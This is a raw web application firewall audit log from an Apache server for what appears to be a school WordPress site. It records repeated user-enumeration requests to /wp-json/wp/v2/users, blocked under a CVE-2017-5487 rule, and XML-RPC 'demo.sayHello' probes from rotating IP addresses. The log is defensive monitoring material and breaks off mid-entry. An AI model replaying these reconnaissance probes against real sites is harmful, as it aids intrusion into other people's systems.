Stopwatch2: 1747498242401621 2505; combined=1342, p1=418, p2=899, p3=0, p4=0, p5=24, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c5b820-Z-- --dd66fe06-A-- [17/May/2025:23:10:49 +0700] aCi1CRKi5m5upc8uMd4vcQAAANY 103.236.140.4 37654 103.236.140.4 8181 --dd66fe06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dd66fe06-C-- demo.sayHello --dd66fe06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd66fe06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498249422060 5357 (- - -) Stopwatch2: 1747498249422060 5357; combined=4005, p1=462, p2=3312, p3=40, p4=54, p5=80, sr=65, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd66fe06-Z-- --b60cc07e-A-- [17/May/2025:23:13:07 +0700] aCi1k-m4kjNN-hEbWjK4-gAAAEc 103.236.140.4 47346 103.236.140.4 8181 --b60cc07e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b60cc07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60cc07e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498387707539 3647 (- - -) Stopwatch2: 1747498387707539 3647; combined=1905, p1=607, p2=1266, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60cc07e-Z-- --6e01fa2e-A-- [17/May/2025:23:13:11 +0700] aCi1l3yxdQCiyU1ENFe4CgAAAAU 103.236.140.4 47646 103.236.140.4 8181 --6e01fa2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e01fa2e-C-- demo.sayHello --6e01fa2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e01fa2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498391792905 4681 (- - -) Stopwatch2: 1747498391792905 4681; combined=3354, p1=485, p2=2650, p3=27, p4=27, p5=109, sr=59, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e01fa2e-Z-- --a5c2e444-A-- [17/May/2025:23:13:57 +0700] aCi1xXyxdQCiyU1ENFe5IgAAAAE 103.236.140.4 50798 103.236.140.4 8181 --a5c2e444-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5c2e444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5c2e444-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498437203751 2517 (- - -) Stopwatch2: 1747498437203751 2517; combined=1164, p1=486, p2=654, p3=0, p4=0, p5=23, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5c2e444-Z-- --4cf7bf0f-A-- [17/May/2025:23:14:04 +0700] aCi1zHyxdQCiyU1ENFe5VgAAAAs 103.236.140.4 51294 103.236.140.4 8181 --4cf7bf0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cf7bf0f-C-- demo.sayHello --4cf7bf0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cf7bf0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498444623809 5846 (- - -) Stopwatch2: 1747498444623809 5846; combined=4281, p1=565, p2=3475, p3=31, p4=35, p5=102, sr=72, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cf7bf0f-Z-- --74a4707d-A-- [17/May/2025:23:19:49 +0700] aCi3Jem4kjNN-hEbWjLEoAAAAFI 103.236.140.4 46556 103.236.140.4 8181 --74a4707d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --74a4707d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74a4707d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498789135424 3412 (- - -) Stopwatch2: 1747498789135424 3412; combined=1846, p1=554, p2=1260, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74a4707d-Z-- --bcf7e17a-A-- [17/May/2025:23:20:00 +0700] aCi3MBKi5m5upc8uMd49hAAAAMY 103.236.140.4 47260 103.236.140.4 8181 --bcf7e17a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcf7e17a-C-- demo.sayHello --bcf7e17a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf7e17a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498800240417 4891 (- - -) Stopwatch2: 1747498800240417 4891; combined=3731, p1=489, p2=2976, p3=38, p4=37, p5=122, sr=58, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf7e17a-Z-- --927a3150-A-- [17/May/2025:23:21:46 +0700] aCi3mhKi5m5upc8uMd5AyAAAAM4 103.236.140.4 54524 103.236.140.4 8181 --927a3150-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --927a3150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --927a3150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498906856467 2217 (- - -) Stopwatch2: 1747498906856467 2217; combined=1115, p1=360, p2=730, p3=0, p4=0, p5=25, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --927a3150-Z-- --8fce1f58-A-- [17/May/2025:23:21:56 +0700] aCi3pHyxdQCiyU1ENFfEuQAAAAY 103.236.140.4 55170 103.236.140.4 8181 --8fce1f58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8fce1f58-C-- demo.sayHello --8fce1f58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fce1f58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498916501141 6155 (- - -) Stopwatch2: 1747498916501141 6155; combined=4745, p1=692, p2=3821, p3=41, p4=54, p5=82, sr=108, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fce1f58-Z-- --d9ba2557-A-- [17/May/2025:23:22:00 +0700] aCi3qBKi5m5upc8uMd5BGAAAAME 103.236.140.4 55408 103.236.140.4 8181 --d9ba2557-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9ba2557-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ba2557-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498920283865 2652 (- - -) Stopwatch2: 1747498920283865 2652; combined=1161, p1=390, p2=749, p3=0, p4=0, p5=22, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ba2557-Z-- --7497c470-A-- [17/May/2025:23:22:03 +0700] aCi3qwTOsBn9MSWb6WL8JAAAAJg 103.236.140.4 55622 103.236.140.4 8181 --7497c470-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7497c470-C-- demo.sayHello --7497c470-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7497c470-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498923883447 6572 (- - -) Stopwatch2: 1747498923883447 6572; combined=5079, p1=694, p2=4149, p3=47, p4=60, p5=78, sr=63, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7497c470-Z-- --1f136712-A-- [17/May/2025:23:23:02 +0700] aCi35hKi5m5upc8uMd5C6AAAANI 103.236.140.4 59662 103.236.140.4 8181 --1f136712-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f136712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f136712-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498982289774 2636 (- - -) Stopwatch2: 1747498982289774 2636; combined=1272, p1=423, p2=815, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f136712-Z-- --adcf343c-A-- [17/May/2025:23:23:06 +0700] aCi36um4kjNN-hEbWjLJlAAAAFY 103.236.140.4 59998 103.236.140.4 8181 --adcf343c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --adcf343c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adcf343c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747498986978240 2259 (- - -) Stopwatch2: 1747498986978240 2259; combined=878, p1=294, p2=559, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adcf343c-Z-- --600c224f-A-- [17/May/2025:23:23:10 +0700] aCi37nyxdQCiyU1ENFfGyAAAAA8 103.236.140.4 60242 103.236.140.4 8181 --600c224f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --600c224f-C-- demo.sayHello --600c224f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --600c224f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498990394770 4287 (- - -) Stopwatch2: 1747498990394770 4287; combined=3074, p1=487, p2=2426, p3=24, p4=25, p5=66, sr=49, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --600c224f-Z-- --860b0a56-A-- [17/May/2025:23:23:14 +0700] aCi38um4kjNN-hEbWjLJyQAAAEo 103.236.140.4 60534 103.236.140.4 8181 --860b0a56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --860b0a56-C-- demo.sayHello --860b0a56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --860b0a56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747498994523770 5270 (- - -) Stopwatch2: 1747498994523770 5270; combined=3827, p1=487, p2=3117, p3=37, p4=31, p5=90, sr=61, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860b0a56-Z-- --29db050b-A-- [17/May/2025:23:23:53 +0700] aCi4Gem4kjNN-hEbWjLKsQAAAEI 103.236.140.4 35068 103.236.140.4 8181 --29db050b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29db050b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29db050b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499033762228 5554 (- - -) Stopwatch2: 1747499033762228 5554; combined=1430, p1=465, p2=810, p3=0, p4=0, p5=155, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29db050b-Z-- --76fd393b-A-- [17/May/2025:23:24:01 +0700] aCi4Iem4kjNN-hEbWjLK4gAAAEk 103.236.140.4 35626 103.236.140.4 8181 --76fd393b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76fd393b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76fd393b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information 